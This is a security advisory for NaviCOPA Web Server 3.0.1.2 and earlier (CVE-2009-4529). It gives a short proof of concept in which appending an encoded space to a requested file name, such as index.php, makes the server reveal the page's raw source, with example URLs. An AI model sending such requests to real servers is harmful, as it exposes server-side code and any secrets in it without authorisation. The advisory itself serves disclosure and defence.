Topic : | NaviCOPA Web Server <= 3.0.1.2 Remote Source Disclosure
|
SecurityAlert : 6905
CVE : CVE-2009-4529
CWE : CWE-200
SecurityRisk : Medium (About)
Remote Exploit : Yes
Local Exploit : No
Victim interaction required : No
Exploit Available : Yes
Credit : Dr_IDE
Published : 02.01.2010
Affected Software : | navicopa:navicopa_web_server:3.0.1.2 and previous versions |
 Advisory Content : ################################################
#
# NaviCOPA Web Server <= 3.0.1.2 Remote Source Disclosure
# Found By: Dr_IDE
# Tested On: Windows XPSP3
# Download: www.navicopa.com/download.html
#
################################################
- Description -
NaviCOPA Web Server <= 3.0.1.2 is a Windows based HTTP server. This is the
latest
version of the application available.
NaviCOPA is vulnerable to remote arbitrary source code disclosure by the
following means.
- Technical Details -
http://[ webserver IP]/[ file ][%20]
http://172.16.2.101/index.html%20
http://172.16.2.101/index.php%20
[pocoftheday.blogspot.com]
References :
http://xforce.iss.net/xforce/xfdb/53799
http://www.vupen.com/english/advisories/2009/2927
http://www.securityfocus.com/bid/36705
http://www.packetstormsecurity.org/0910-exploits/navicopa-disclose.txt
http://secunia.com/advisories/37014
http://pocoftheday.blogspot.com/2009/10/navicopa-web-server-3012-remote-source.html
http://osvdb.org/58949
http://freetexthost.com/n5l0h34pxc
Feedback :
If you have additional information or notice any errors regarding this security advisory, please use contact form or email us at info()securityreason()com.
|